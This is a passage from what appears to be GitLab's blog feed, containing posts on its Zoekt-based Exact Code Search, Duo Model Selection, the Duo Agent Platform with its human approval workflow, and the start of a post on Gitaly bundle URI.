<li><strong>2025-06-06T12:25:</strong> GitHub suspends <code>github.com/qiiniu</code></li>
</ul>
]]></content>
        <author>
            <name>Michael Henriksen</name>
            <uri>https://about.gitlab.com/blog/authors/michael-henriksen</uri>
        </author>
        <published>2025-06-30T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Exact Code Search: Find code faster across repositories]]></title>
        <id>https://about.gitlab.com/blog/exact-code-search-find-code-faster-across-repositories/</id>
        <link href="https://about.gitlab.com/blog/exact-code-search-find-code-faster-across-repositories/"/>
        <updated>2025-06-25T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p><strong>TL;DR:</strong> What if you could find any line of code across 48 TB of repositories in milliseconds? GitLab's new <a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">Exact Code Search</a> makes this possible, delivering pinpoint precision, powerful regex support, and contextual multi-line results that transform how teams work with large codebases.</p>
<h2>Why traditional code search is challenging</h2>
<p>Anyone who works with code knows the frustration of searching across repositories. Whether you're a developer debugging an issue, a DevOps engineer examining configurations, a security analyst searching for vulnerabilities, a technical writer updating documentation, or a manager reviewing implementation, you know exactly what you need, but traditional search tools often fail you.</p>
<p>These conventional tools return dozens of false positives, lack the context needed to understand results, and slow to a crawl as codebases grow. The result? Valuable time spent hunting for needles in haystacks instead of building, securing, or improving your software.</p>
<p>GitLab's code search functionality has historically been backed by Elasticsearch or OpenSearch. While these are excellent for searching issues, merge requests, comments, and other data containing natural language, they weren't specifically designed for code. After <a href="https://gitlab.com/groups/gitlab-org/-/epics/7404">evaluating numerous options</a>, we developed a better solution.</p>
<h2>Introducing Exact Code Search: Three game-changing capabilities</h2>
<p>Enter GitLab's <strong><a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">Exact Code Search</a></strong>, currently in beta testing and powered by <a href="https://github.com/sourcegraph/zoekt">Zoekt</a> (pronounced &quot;zookt&quot;, Dutch for &quot;search&quot;). Zoekt is an open-source code search engine originally created by Google and now maintained by Sourcegraph, specifically designed for fast, accurate code search at scale. We've enhanced it with GitLab-specific integrations, enterprise-scale improvements, and seamless permission system integration.</p>
<p>This feature revolutionizes how you find and understand code with three key capabilities:</p>
<p><strong>1. Exact Match mode: Zero false positives</strong></p>
<p>When toggled to <strong>Exact Match mode</strong>, the search engine returns only results that match your query exactly as entered, eliminating false positives. This precision is invaluable when:</p>
<ul>
<li>Searching for specific error messages</li>
<li>Looking for particular function signatures</li>
<li>Finding instances of specific variable names</li>
</ul>
<p><strong>2. Regular Expression mode: Powerful pattern matching</strong></p>
<p>For complex search needs, Regular Expression mode allows you to craft sophisticated search patterns:</p>
<ul>
<li>Find functions following specific naming patterns</li>
<li>Locate variables matching certain constraints</li>
<li>Identify potential security vulnerabilities using pattern matching</li>
</ul>
<p><strong>3. Multiple-line matches: See code in context</strong></p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750704179/ttjuilkt3v7gtyywnchx.png" alt="Exact Code Search"></p>
<p>Instead of seeing just a single line with your matching term, you get the surrounding context that's crucial for understanding the code. This eliminates the need to click through to files for basic comprehension, significantly accelerating your workflow.</p>
<h2>From features to workflows: Real-world use cases and impact</h2>
<p>Let's see how these capabilities translate to real productivity gains in everyday development scenarios:</p>
<h3>Debugging: From error message to root cause in seconds</h3>
<p>Before Exact Code Search:
Copy an error message, search, wade through dozens of partial matches in comments and documentation, click through multiple files, and eventually find the actual code.</p>
<p>With Exact Code Search:</p>
<ol>
<li>Copy the exact error message</li>
<li>Paste it into Exact Code Search with Exact Match mode</li>
<li>Instantly find the precise location where the error is thrown, with surrounding context</li>
</ol>
<p><strong>Impact:</strong> Reduce debugging time from minutes to seconds, eliminating the frustration of false positives.</p>
<h3>Code exploration: Master unfamiliar codebases quickly</h3>
<p>Before Exact Code Search:
Browse through directories, make educated guesses about file locations, open dozens of files, and slowly build a mental map of the codebase.</p>
<p>With Exact Code Search:</p>
<ul>
<li>Search for key methods or classes with Exact Match mode</li>
<li>Review multiple line matches to understand implementation details</li>
<li>Use Regular Expression mode to find similar patterns across the codebase</li>
</ul>
<p><strong>Impact:</strong> Build a mental map of code structure in minutes rather than hours, dramatically accelerating onboarding and cross-team collaboration.</p>
<h3>Refactoring with confidence</h3>
<p>Before Exact Code Search:
Attempt to find all instances of a method, miss some occurrences, and introduce bugs through incomplete refactoring.</p>
<p>With Exact Code Search:</p>
<ul>
<li>Use Exact Match mode to find all occurrences of methods or variables</li>
<li>Review context to understand usage patterns</li>
<li>Plan your refactoring with complete information about impact</li>
</ul>
<p><strong>Impact:</strong> Eliminate the &quot;missed instance&quot; bugs that often plague refactoring efforts, improving code quality and reducing rework.</p>
<h3>Security auditing: Finding vulnerable patterns</h3>
<p>Security teams can:</p>
<ul>
<li>Create regex patterns matching known vulnerable code</li>
<li>Search across all repositories in a namespace</li>
<li>Quickly identify potential security issues with context that helps assess risk</li>
</ul>
<p><strong>Impact:</strong> Transform security audits from manual, error-prone processes to systematic, comprehensive reviews.</p>
<h3>Cross-repository insights</h3>
<p>Search across your entire namespace or instance to:</p>
<ul>
<li>Identify similar implementations across different projects</li>
<li>Discover opportunities for shared libraries or standardization</li>
</ul>
<p><strong>Impact:</strong> Break down silos between projects and identify opportunities for code reuse and standardization.</p>
<h2>The technical foundation: How Zoekt delivers speed and precision</h2>
<p>Before diving into our scale achievements, let's explore what makes Zoekt fundamentally different from traditional search engines — and why it can find exact matches so incredibly fast.</p>
<h3>Positional trigrams: The secret to lightning-fast exact matches</h3>
<p>Zoekt's speed comes from its use of <strong>positional trigrams</strong> — a technique that indexes every sequence of three characters along with their exact positions in files. This approach solves one of the biggest pain points developers have had with Elasticsearch-based code search: false positives.</p>
<p>Here's how it works:</p>
<p><strong>Traditional full-text search engines</strong> like Elasticsearch tokenize code into words and lose positional information. When you search for <code>getUserId()</code>, they might return results containing <strong>user</strong>, <strong>get</strong>, and <strong>Id</strong> scattered throughout a file — leading to those frustrating false positives for GitLab users.</p>
<p><strong>Zoekt's positional trigrams</strong> maintain exact character sequences and their positions. When you search for <code>getUserId()</code>, Zoekt looks for the exact trigrams like <strong>get</strong>, <strong>etU</strong>, <strong>tUs</strong>, <strong>Use</strong>, <strong>ser</strong>, <strong>erI</strong>, <strong>rId</strong>, <strong>Id(&quot;, &quot;d()</strong>, all in the correct sequence and position. This ensures that only exact matches are returned.</p>
<p>The result? Search queries that previously returned hundreds of irrelevant results now return only the precise matches you're looking for. This was <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/325234">one of our most requested features</a> for good reason - developers were losing significant time sifting through false positives.</p>
<h3>Regular expression performance at scale</h3>
<p>Zoekt excels at exact matches and is optimized for regular expression searches. The engine uses sophisticated algorithms to convert regex patterns into efficient trigram queries when possible, maintaining speed even for complex patterns across terabytes of code.</p>
<h2>Built for enterprise scale</h2>
<p>Exact Code Search is powerful and built to handle massive scale with impressive performance. This is not just a new UI feature — it's powered by a completely reimagined backend architecture.</p>
<h3>Handling terabytes of code with ease</h3>
<p>On GitLab.com alone, our Exact Code Search infrastructure indexes and searches over <strong>48 TB</strong> of code data while maintaining lightning-fast response times. This scale represents millions of repositories across thousands of namespaces, all searchable within milliseconds. To put this in perspective: This scale represents more code than the entire Linux kernel, Android, and Chromium projects combined. Yet Exact Code Search can find a specific line across this massive codebase in milliseconds.</p>
<h3>Self-registering node architecture</h3>
<p>Our innovative implementation features:</p>
<ul>
<li><strong>Automatic node registration:</strong> Zoekt nodes register themselves with GitLab</li>
<li><strong>Dynamic shard assignment:</strong> The system automatically assigns namespaces to nodes</li>
<li><strong>Health monitoring:</strong> Nodes that don't check in are automatically marked offline</li>
</ul>
<p>This self-configuring architecture dramatically simplifies scaling. When more capacity is needed, administrators can simply add more nodes without complex reconfiguration.</p>
<h3>Distributed system with intelligent load balancing</h3>
<p>Behind the scenes, Exact Code Search operates as a distributed system with these key components:</p>
<ul>
<li><strong>Specialized search nodes:</strong> Purpose-built servers that handle indexing and searching</li>
<li><strong>Smart sharding:</strong> Code is distributed across nodes based on namespaces</li>
<li><strong>Automatic load balancing:</strong> The system intelligently distributes work based on capacity</li>
<li><strong>High availability:</strong> Multiple replicas ensure continuous operation even if nodes fail</li>
</ul>
<p><em>Note: High availability is built into the architecture but not yet fully enabled. See <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/514736">Issue 514736</a> for updates.</em></p>
<h3>Seamless security integration</h3>
<p>Exact Code Search automatically integrates with GitLab's permission system:</p>
<ul>
<li>Search results are filtered based on the user's access rights</li>
<li>Only code from projects the user has access to is displayed</li>
<li>Security is built into the core architecture, not added as an afterthought</li>
</ul>
<h3>Optimized performance</h3>
<ul>
<li><strong>Efficient indexing:</strong> Large repositories are indexed in tens of seconds</li>
<li><strong>Fast query execution:</strong> Most searches return results with sub-second response times</li>
<li><strong>Streaming results:</strong> The new gRPC-based federated search streams results as they're found</li>
<li><strong>Early termination:</strong> Once enough results are collected, the system pauses searching</li>
</ul>
<h2>From library to distributed system: Engineering challenges we solved</h2>
<p>While Zoekt provided the core search technology, it was originally designed as a minimal library for managing <code>.zoekt</code> index files - not a distributed database or enterprise-scale service. Here are the key engineering challenges we overcame to make it work at GitLab's scale&quot;</p>
<h3>Challenge 1: Building an orchestration layer</h3>
<p><strong>The problem:</strong> Zoekt was designed to work with local index files, not distributed across multiple nodes serving many concurrent users.</p>
<p><strong>Our solution:</strong> We built a comprehensive orchestration layer that:</p>
<ul>
<li>Creates and manages database models to track nodes, indices, repositories, and tasks</li>
<li>Implements a self-registering node architecture (inspired by GitLab Runner)</li>
<li>Handles automatic shard assignment and load balancing across nodes</li>
<li>Provides bidirectional API communication between GitLab Rails and Zoekt nodes</li>
</ul>
<h3>Challenge 2: Scaling storage and indexing</h3>
<p><strong>The problem:</strong> How do you efficiently manage terabytes of index data across multiple nodes while ensuring fast updates?</p>
<p><strong>Our solution:</strong> We implemented:</p>
<ul>
<li>Intelligent sharding: Namespaces are distributed across nodes based on capacity and load</li>
<li>Independent replication: Each node independently indexes from <a href="https://gitlab.com/gitlab-org/gitaly">Gitaly</a> (our Git storage service), eliminating complex synchronization</li>
<li>Watermark management: Sophisticated storage allocation that prevents nodes from running out of space</li>
<li>Unified binary architecture: A single <code>gitlab-zoekt</code> binary that can operate in both indexer and webserver modes</li>
</ul>
<h3>Challenge 3: Permission Integration</h3>
<p><strong>The problem:</strong> Zoekt had no concept of GitLab's complex permission system - users should only see results from projects they can access.</p>
<p><strong>Our solution:</strong> We built native permission filtering directly into the search flow:</p>
<ul>
<li>Search requests include user permission context</li>
<li>Results are filtered to include only those the user can access in case permissions change before indexing completes</li>
</ul>
<h3>Challenge 4: Operational simplicity</h3>
<p><strong>The problem:</strong> Managing a distributed search system shouldn't require a dedicated team.</p>
<p><strong>Our solution:</strong></p>
<ul>
<li>Auto-scaling: Adding capacity is as simple as deploying more nodes - they automatically register and start handling work</li>
<li>Self-healing: Nodes that don't check in are automatically marked offline and their work redistributed</li>
<li>Zero-configuration sharding: The system automatically determines optimal shard assignments</li>
</ul>
<h2>Gradual rollout: Minimizing risk at scale</h2>
<p>Rolling out a completely new search backend to millions of users required careful planning. Here's how we minimized customer impact while ensuring reliability:</p>
<h3>Phase 1: Controlled testing (gitlab-org group)</h3>
<p>We started by enabling Exact Code Search only for the <code>gitlab-org</code> group - our own internal repositories. This allowed us to:</p>
<ul>
<li>Test the system with real production workloads</li>
<li>Identify and fix performance bottlenecks</li>
<li>Streamline the deployment process</li>
<li>Learn from real users' workflows and feedback</li>
</ul>
<h3>Phase 2: Performance validation and optimization</h3>
<p>Before expanding, we focused on ensuring the system could handle GitLab.com's scale:</p>
<ul>
<li>Implemented comprehensive monitoring and alerting</li>
<li>Validated storage management with real production data growth</li>
</ul>
<h3>Phase 3: Incremental customer expansion</h3>
<p>We gradually expanded to customers interested in testing Exact Code Search:</p>
<ul>
<li>Gathered feedback on performance and user experience</li>
<li>Refined the search UI based on real user workflows</li>
<li>Optimized indexing performance (large repositories like <code>gitlab-org/gitlab</code> now index in ~10 seconds)</li>
<li>Refined the architecture based on operational learnings</li>
<li>Massively increased indexing throughput and improved state transition livecycle</li>
</ul>
<h3>Phase 4: Broad rollout</h3>
<p>Today, over 99% of Premium and Ultimate licensed groups on GitLab.com have access to Exact Code Search. Users can:</p>
<ul>
<li>Toggle between regex and exact search modes</li>
<li>Experience the benefits without any configuration changes</li>
<li>Fall back to the previous search if needed (though few choose to)</li>
</ul>
<p>Rolling this out gradually meant users didn't experience service disruptions, performance degradation, or feature gaps during the transition. We've already received positive feedback from users as they notice their results becoming more relevant and faster.</p>
<blockquote>
<p><strong>For technical deep dive:</strong> Interested in the detailed architecture and implementation? Check out our comprehensive <a href="https://handbook.gitlab.com/handbook/engineering/architecture/design-documents/code_search_with_zoekt/">design document</a> for in-depth technical details about how we built this distributed search system.</p>
</blockquote>
<h2>Getting started with Exact Code Search</h2>
<p>Getting started with Exact Code Search is simple because it's already enabled by default for Premium and Ultimate groups on GitLab.com (over 99% of eligible groups currently have access).</p>
<h3>Quickstart guide</h3>
<ol>
<li>Navigate to the Advanced Search in your GitLab project or group</li>
<li>Enter your search term in the code tab</li>
<li>Toggle between Exact Match and Regular Expression modes</li>
<li>Use filters to refine your search</li>
</ol>
<h3>Basic search syntax</h3>
<p>Whether using Exact Match or Regular Expression mode, you can refine your search with modifiers:</p>
<table>
<thead>
<tr>
<th>Query Example</th>
<th>What It Does</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>file:js</code></td>
<td>Searches only in files containing &quot;js&quot; in their name</td>
</tr>
<tr>
<td><code>foo -bar</code></td>
<td>Finds &quot;foo&quot; but excludes results with &quot;bar&quot;</td>
</tr>
<tr>
<td><code>lang:ruby</code></td>
<td>Searches only in Ruby files</td>
</tr>
<tr>
<td><code>sym:process</code></td>
<td>Finds &quot;process&quot; in symbols (methods, classes, variables)</td>
</tr>
</tbody>
</table>
<blockquote>
<p><strong>Pro Tip:</strong> For the most efficient searches, start specific and then broaden if needed. Using <code>file:</code> and <code>lang:</code> filters dramatically increases relevance.</p>
</blockquote>
<h3>Advanced search techniques</h3>
<p>Stack multiple filters for precision:</p>
<pre><code>is_expected file:rb -file:spec
</code></pre>
<p>This finds &quot;is_expected&quot; in Ruby files that don't have &quot;spec&quot; in their name.</p>
<p>Use regular expressions for powerful patterns:</p>
<pre><code>token.*=.*[\&quot;']
</code></pre>
<p><a href="https://gitlab.com/search?search=token.*%3D.*%5B%5C%22'%5D&amp;nav_source=navbar&amp;project_id=46649240&amp;group_id=9970&amp;search_code=true&amp;repository_ref=main&amp;regex=true">Watch this search performed against the GitLab Zoekt repository.</a></p>
<p>The search helps find hardcoded passwords, which, if not found, can be a security issue.</p>
<p>For more detailed syntax information, check the <a href="https://docs.gitlab.com/user/search/exact_code_search/#syntax">Exact Code Search documentation</a>.</p>
<h2>Availability and deployment</h2>
<h3>Current availability</h3>
<p>Exact Code Search is currently in Beta for GitLab.com users with Premium and Ultimate licenses:</p>
<ul>
<li>Available for over 99% of licensed groups</li>
<li>Search in the UI automatically uses Zoekt when available, Exact Code Search in Search API is behind a feature flag</li>
</ul>
<h3>Self-managed deployment options</h3>
<p>For self-managed instances, we offer several deployment methods:</p>
<ul>
<li>Kubernetes/Helm: Our most well-supported method, using our <a href="https://gitlab.com/gitlab-org/cloud-native/charts/gitlab-zoekt"><code>gitlab-zoekt</code> Helm chart</a></li>
<li>Other deployment options: We're working on streamlining deployment for Omnibus and other installation methods</li>
</ul>
<p>System requirements depend on your codebase size, but the architecture is designed to scale horizontally and/or vertically as your needs grow.</p>
<h2>What's coming next</h2>
<p>While Exact Code Search is already powerful, we're continuously improving it:</p>
<ul>
<li><strong>Scale optimizations</strong> to support instances with hundreds of thousands of repositories</li>
<li><strong>Improved self-managed deployment</strong> options, including streamlined Omnibus support</li>
<li><strong>Full high availability support</strong> with automatic failover and load balancing</li>
</ul>
<p>Stay tuned for updates as we move from Beta to General Availability.</p>
<h2>Transform how you work with code</h2>
<p>GitLab's Exact Code Search represents a fundamental rethinking of code discovery. By delivering exact matches, powerful regex support, and contextual results, it solves the most frustrating aspects of code search:</p>
<ul>
<li>No more wasting time with irrelevant results</li>
<li>No more missing important matches</li>
<li>No more clicking through files just to understand basic context</li>
<li>No more performance issues as codebases grow</li>
</ul>
<p>The impact extends beyond individual productivity:</p>
<ul>
<li><strong>Teams collaborate better</strong> with easy code referencing</li>
<li><strong>Knowledge sharing accelerates</strong> when patterns are discoverable</li>
<li><strong>Onboarding becomes faster</strong> with quick codebase comprehension</li>
<li><strong>Security improves</strong> with effective pattern auditing</li>
<li><strong>Technical debt reduction</strong> becomes more feasible</li>
</ul>
<p>Exact Code Search isn't just a feature, it's a better way to understand and work with code. Stop searching and start finding.</p>
<p><strong>We'd love to hear from you!</strong> Share your experiences, questions, or feedback about Exact Code Search in our <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/420920">feedback issue</a>. Your input helps us prioritize improvements and new features.</p>
<blockquote>
<h4>Ready to experience smarter code search? Learn more in our <a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">documentation</a> or try it now by performing a search in your Premium or Ultimate licensed namespaces or projects. Not a GitLab user yet? Try <a href="https://about.gitlab.com/free-trial/">a free, 60-day trial of GitLab Ultimate with Duo</a>!</h4>
</blockquote>
]]></content>
        <author>
            <name>Dmitry Gruzd</name>
            <uri>https://about.gitlab.com/blog/authors/dmitry-gruzd</uri>
        </author>
        <published>2025-06-25T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Speed meets governance: Model Selection comes to GitLab Duo]]></title>
        <id>https://about.gitlab.com/blog/speed-meets-governance-model-selection-comes-to-gitlab-duo/</id>
        <link href="https://about.gitlab.com/blog/speed-meets-governance-model-selection-comes-to-gitlab-duo/"/>
        <updated>2025-06-25T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>New AI models are released almost daily, each with unique capabilities, performance characteristics, and compliance implications. At GitLab, we're committed to delivering cutting-edge AI capabilities by <a href="https://about.gitlab.com/blog/2024/05/09/developing-gitlab-duo-how-we-validate-and-test-ai-models-at-scale/">continuously integrating the latest and highest-performing models as they become available</a>. However, we know this fast pace can create complex challenges for enterprise organizations whose model usage is subject to strict governance, compliance, and security standards.</p>
<p>Meet <a href="https://docs.gitlab.com/user/gitlab_duo/model_selection/">GitLab Duo Model Selection</a>, a powerful new capability that gives teams control over the large language models (<a href="https://about.gitlab.com/blog/what-is-a-large-language-model-llm/">LLMs</a>) used in your organization. Available in private beta in the newly released <a href="https://about.gitlab.com/releases/2025/06/19/gitlab-18-1-released/">GitLab 18.1</a> to all GitLab.com customers using Duo Enterprise, Duo Model Selection makes it easier to maintain governance, compliance, and security standards while helping accelerate innovation with agentic and generative AI. With Duo Model Selection, organizations can adopt GitLab Duo faster by selecting models from their pre-approved vendor list, versus the GitLab default model.</p>
<h2>The benefits of GitLab Duo Model Selection</h2>
<p>Duo Model Selection gives GitLab.com namespace owners control over which AI models teams can use across different GitLab Duo features, though those without specialized requirements are recommended to use the GitLab default model. With Duo Model Selection, you can:</p>
<ul>
<li>
<p><strong>Configure models at the organization level:</strong> Set AI model preferences that apply across your organization’s entire namespace, ensuring consistent governance and compliance standards. Namespace owners can select models approved by their organization from GitLab's validated model catalog.</p>
</li>
<li>
<p><strong>Control models per GitLab Duo feature:</strong> Different GitLab Duo features can use different models based on your specific needs.</p>
</li>
</ul>
<p>Watch Duo Model Selection in action:</p>
<p>&lt;div style=&quot;padding:62.21% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1094452473?autoplay=1&quot;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;Duo Model Selection Demo&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>Join the Duo Model Selection private beta</h2>
<p>Ready to take control of your AI governance? Duo Model Selection is currently in private beta for all GitLab.com customers using Duo Enterprise. To join the private beta, reach out to your GitLab account team. If you don’t have Duo, <a href="https://about.gitlab.com/gitlab-duo/#free-trial">sign up for a GitLab Duo trial</a> today!</p>
<blockquote>
<p>Find out everything that's new and exciting, including agentic AI capabilities, in GitLab 18 with our <a href="https://about.gitlab.com/eighteen/">on-demand launch event</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Susie Bitters</name>
            <uri>https://about.gitlab.com/blog/authors/susie-bitters</uri>
        </author>
        <published>2025-06-25T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab Duo Agent Platform: What’s next for intelligent DevSecOps]]></title>
        <id>https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/</id>
        <link href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/"/>
        <updated>2025-06-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>I’m thrilled to introduce the next evolution of Duo Workflow: GitLab Duo Agent Platform. This innovative platform extends agentic capabilities across the software development lifecycle, enabling teams to work in parallel with multiple AI agents.</p>
<p>Imagine starting your day like this:</p>
<ul>
<li>You assign one AI agent to conduct deep research on an epic your team is working on, provide the latest updates on all contributions from the past week, and suggest a release post based on recent feature additions.</li>
<li>In parallel, you delegate a handful of accessibility bugs to several agents for analysis and to make the necessary code changes to resolve them.</li>
<li>Meanwhile, you ask another agent to review your complicated code changes and provide feedback before sending them to your teammate for formal review.</li>
<li>Finally, when the security team pings you about a new vulnerability that needs investigation across your entire project, you hand that research task to your security agent.</li>
</ul>
<p>All of this happens simultaneously, while you focus on architecture decisions, creative problem-solving, and strategic technical work. GitLab Duo Agent Platform will let you delegate tasks to five, 10, or even 100 specialized agents — all with full context of your project, not just your code, including CI job logs, planning work items, and so much more. You’re automating the tedious work you have to do, so you can focus on the work that inspires you.</p>
<p><strong>This isn't about replacing developers. It's about amplifying human creativity and expertise by removing the friction from routine tasks.</strong> That’s the future we’re building with GitLab Duo Agent Platform.</p>
<h2>What is GitLab Duo Agent Platform?</h2>
<p>GitLab Duo Agent Platform will enable many-to-many collaboration between engineers and <a href="https://about.gitlab.com/topics/agentic-ai/">AI agents</a> across the full software development lifecycle, designed to help teams dramatically improve productivity and cycle time.</p>
<p>Built on GitLab’s secure foundation, GitLab Duo Agent Platform is customizable and extendable. It empowers developers to build agents to tackle all kinds of software engineering problems, leveraging context across your entire software development lifecycle.</p>
<p>GitLab Duo Agent Platform will go beyond code creation with specialized agents and custom workflows that can help with a nearly unlimited list of activities, including:</p>
<ul>
<li>Issue implementation</li>
<li>Large-scale migrations/dependency upgrades</li>
<li>Automated documentation building/release posts</li>
<li>Fixing broken pipelines</li>
<li>Incident research support</li>
<li>Deep research of status and information on topics</li>
<li>Backlog administration</li>
<li>Vulnerability resolution</li>
<li>Reviews for specific types of code (e.g. database)</li>
<li>Quick internal tool building based on existing build blocks</li>
<li>and many more!</li>
</ul>
<p>You will be able to use our agents out of the box as well as customize and extend them. We’re currently beta testing GitLab Duo Agent Platform with dozens of customers and will open beta access to more teams soon.</p>
<p>Watch GitLab Duo Agent Platform in action:
&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1095679084?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;Agent Platform Demo Clip&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>Choose your tools, your models, and your agents</h2>
<p>Consistent with GitLab’s commitment to being an open platform, GitLab agents will seamlessly interoperate with your choice of code-authoring developer tools via standard model context protocol (MCP) and the agent-to-agent (A2A) framework, whether you’re using Cursor, Claude Code, Windsurf, OpenAI Codex, or others.</p>
<p>The platform will accept code contributions from any development tool in your stack, whether that code was written by a human developer or generated by an AI agent. This means your existing workflows and preferred tools will continue to work seamlessly as you integrate agent capabilities.</p>
<p>GitLab Duo Agent Platform will work with any approved language model that <a href="https://about.gitlab.com/ai-transparency-center/#ai-continuity-plan">meets our selection criteria</a>. For organizations with strict security requirements, it will support approved self-hosted models running in completely air-gapped environments. Your infrastructure requirements and security policies won’t limit your ability to benefit from agentic development.</p>
<h2>Context is everything, and your GitLab Duo agents have it</h2>
<p>The difference between a helpful AI tool and a truly intelligent agent comes down to context. With GitLab Duo Agent Platform, agents don't work in isolation — they're deeply integrated into the platform where development work happens.</p>
<p>Every agent will automatically understand the full picture of your projects, including your open issues and their history, the merge requests that resolved them, the structure and rationale behind your code, your CI/CD pipeline configurations, security findings, compliance requirements, and the intricate relationships between all these components.</p>
<p>Just like your human team members, agents have all the context to help you ship secure software faster. Instead of just answering questions about code, they will be able to provide insights about how a proposed change might affect your deployment pipeline or suggest security improvements based on your existing compliance rules. We believe that the more your team works within GitLab’s DevSecOps platform, the smarter your agents will become.</p>
<h2>Stay in control while agents scale your team</h2>
<p>Building trust with AI agents isn't fundamentally different from building trust with new team members. You need to see their work, understand their approach, and gradually increase their responsibilities as they prove their competence.</p>
<p>That's the philosophy behind our agent approval workflow. Before any agent makes changes to your code or environment, it will present you with a clear plan: what it understands about the issue, the approach it will take, and the specific actions it wants to perform. You’ll then get the opportunity to review, approve, or redirect as needed. Over time, as agents consistently deliver quality work, you will be able to grant them greater autonomy for routine tasks while maintaining oversight for complex or critical work.</p>
<h2>Built for community and customization</h2>
<p>GitLab has always thrived on community contributions, and this year marked a milestone with record-breaking customer contributions to our platform. Now we're extending that same collaborative energy to AI agents through our open framework approach.</p>
<p>GitLab Duo Agent Platform isn't just about the agents we build — it's about empowering you and the broader community to create specialized agents that solve your unique engineering challenges. Whether you need an agent that understands your specific coding standards, integrates with your custom toolchain, or handles domain-specific tasks, the platform will give you the building blocks to make it happen.</p>
<p>This community-driven model creates a virtuous cycle that leverages the strength of the GitLab community through global sharing, similar to our <a href="https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/">CI/CD Catalog</a>. Diverse real-world use cases drive innovation. Enterprise feedback ensures reliability and security. And shared solutions benefit everyone. It's the same collaborative approach that has made GitLab successful, now applied to the frontier of agentic development.</p>
<h2>How to get started</h2>
<p>If you've been experimenting with <a href="https://about.gitlab.com/blog/2025/05/29/gitlab-duo-chat-gets-agentic-ai-makeover/">GitLab Duo Agentic Chat</a>, now included with every GitLab 18 Premium and Ultimate GitLab.com user license, you've already gotten a taste of what's possible with AI agents in your development workflow.</p>
<p>To see what GitLab Duo Agent Platform can do and what we’re working on, check out the <a href="https://about.gitlab.com/eighteen/">demos in the recording of our annual GitLab 18 release event</a>.</p>
<p>Want to be among the first to experience it? Sign up for the GitLab <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">Duo Agent Platform beta waitlist</a>. This summer, we'll be opening access to more teams, with new agent features coming out in GitLab 18's upcoming releases throughout the year. We expect general availability this winter.</p>
<p><em>Disclaimer: This presentation contains information related to upcoming products, features, and functionality. It is important to note that the information in this presentation is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this presentation and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab Inc.</em></p>
<h2>Learn more</h2>
<ul>
<li><a href="https://about.gitlab.com/the-source/ai/from-vibe-coding-to-agentic-ai-a-roadmap-for-technical-leaders/">From vibe coding to agentic AI: A roadmap for technical leaders</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/devops-automation-ai-agents/">DevOps automation and AI agents</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/ai-augmented-software-development/">AI-augmented software development: Agentic AI for DevOps</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/ai-code-analysis/">AI-driven code analysis: The new frontier in code security</a></li>
</ul>
]]></content>
        <author>
            <name>Bill Staples</name>
            <uri>https://about.gitlab.com/blog/authors/bill-staples</uri>
        </author>
        <published>2025-06-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Reduce the load on GitLab Gitaly with bundle URI]]></title>
        <id>https://about.gitlab.com/blog/reduce-the-load-on-gitlab-gitaly-with-bundle-uri/</id>
        <link href="https://about.gitlab.com/blog/reduce-the-load-on-gitlab-gitaly-with-bundle-uri/"/>
        <updated>2025-06-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Gitaly plays a vital role in the GitLab ecosystem — it is the server
component that handles all Git operations. Every push and pull made to/from
a repository is handled by Gitaly, which has direct access to the disk where
the actual repositories are stored. As a result, when Gitaly is under heavy
load, some operations like CI/CD pipelines and browsing a repository in the
GitLab UI can become quite slow. This is particularly true when serving
clones and fetches for large and busy monorepos, which can consume large
amounts of CPU and memory.</p>
<p><a href="https://docs.gitlab.com/administration/gitaly/bundle_uris/">Bundle URI</a> takes significant load off of Gitaly servers during clones by allowing Git to pre-download a bundled repository from object storage before calling the Gitaly servers to fetch the remaining objects.</p>
<p>Here is a graph that shows the difference between clones without and with bundle URI.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750705069/rvbm4ru1w58msd6zv4x7.png" alt="Graph that shows the difference between clones without and with bundle URI"></p>
